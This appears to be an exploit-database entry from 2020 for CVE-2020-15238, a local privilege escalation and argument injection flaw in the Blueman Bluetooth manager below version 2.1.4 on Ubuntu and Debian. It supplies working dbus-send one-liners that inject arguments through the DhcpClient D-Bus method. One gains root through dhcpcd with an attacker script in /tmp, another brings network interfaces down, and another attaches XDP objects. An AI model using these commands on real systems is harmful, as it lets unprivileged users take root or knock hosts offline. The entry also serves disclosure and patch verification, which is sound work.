Share
## https://sploitus.com/exploit?id=PACKETSTORM:159740
# Exploit Title: Local Privilege Escalation in Blueman < 2.1.4  
# Date: 2020-10-27  
# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)  
# Vendor Homepage: https://github.com/blueman-project/blueman  
# Software Link: https://github.com/blueman-project/blueman  
# Version: < 2.1.4  
# Tested on: Ubuntu 20.04  
# CVE: CVE-2020-15238  
#  
# By default installed on Ubuntu 16.04 - 20.10 and  
# Debian 9 - 11  
#  
# Local root exploit when dhcpcd is used instead of dhclient  
#   
# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html  
#  
#   
# The DhcpClient method of the d-bus interface to blueman-mechanism   
# is prone to an argument injection vulnerability.   
# On systems where the isc-dhcp-client package is removed   
# and the dhcpcd package installed, this leads to Local   
# Privilege Escalation to root from any unprivileged user.   
# See attached python script for a working exploit. Or use   
# this oneliner with a shellscript "/tmp/eye":  
  
dbus-send --print-reply --system --dest=org.blueman.Mechanism \  
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \  
string:"-c/tmp/eye"  
  
# This happens because the argument is not sanitized before   
# being used as an argument to dhcpcd.  
#   
# Also on default installations with isc-dhcp-client installed,   
# this can lead to DoS attacks by bringing any interface down   
# as follows:  
  
dbus-send --print-reply --system --dest=org.blueman.Mechanism \  
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \  
string:"ens33 down al"  
  
# Or allows users to attach XDP objects to an interface:  
  
dbus-send --print-reply --system --dest=org.blueman.Mechanism \  
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \  
string:"ens33 down al"  
dbus-send --print-reply --system --dest=org.blueman.Mechanism \  
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \  
string:"ens33 name a"  
dbus-send --print-reply --system --dest=org.blueman.Mechanism \  
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \  
string:"a xdp o /tmp/o"  
  
# This both happens because the argument is passed to "ip link"   
# unsanitized.